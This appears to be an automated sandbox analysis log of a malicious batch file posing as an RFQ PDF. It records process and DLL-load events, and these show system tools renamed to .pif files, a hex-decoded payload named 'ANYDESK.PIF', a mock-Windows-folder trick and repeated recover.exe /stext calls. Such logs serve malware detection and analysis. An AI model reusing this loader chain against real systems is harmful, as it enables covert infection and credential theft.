Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1
Source: C:\Users\Public\alpha.pif Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF
Source: C:\Users\Public\rdha.pif Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0
Source: C:\Users\Public\ANYDESK.PIF Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5964.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\ANYDESK.PIF Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\15897.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Users\Public\ANYDESK.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif"
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw"
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw"
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw"
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc"
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg"
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg"
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg"
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1
Source: C:\Users\Public\alpha.pif Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF
Source: C:\Users\Public\rdha.pif Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0
Source: C:\Users\Public\ANYDESK.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0 Jump to behavior
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9 Jump to behavior
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 Jump to behavior
Source: C:\Users\Public\alpha.pif Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1 Jump to behavior
Source: C:\Users\Public\rdha.pif Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF" Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5964.cmd"" Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\15897.cmd"" Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0 Jump to behavior
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12
Source: C:\Users\Public\alpha.pif Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Source: C:\Users\Public\rdha.pif Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF"
Source: C:\Users\Public\ANYDESK.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\Public\expha.pif Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\Public\expha.pif Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\Public\expha.pif Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: certcli.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: cryptui.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: secur32.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: certca.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: samcli.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: logoncli.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: dsrole.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: netutils.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: certcli.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: cryptui.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: certca.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: secur32.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: samcli.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: logoncli.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: dsrole.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: netutils.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Public\ghf.pif Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: zipfldr.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: propsys.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: edputil.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: netutils.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: slc.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: sppc.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\Public\rdha.pif Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: version.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: url.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: userenv.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: netutils.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: propsys.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: winmm.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: wininet.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??????????.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ????.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ???e???????????.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ???e???????????.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??????????.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ???.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ???.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ???.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ????.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: sppc.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: tquery.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: cryptdll.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: spp.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: vssapi.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: vsstrace.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: advapi.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: sppwmi.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: slc.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: sppcext.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: winscard.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: devobj.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
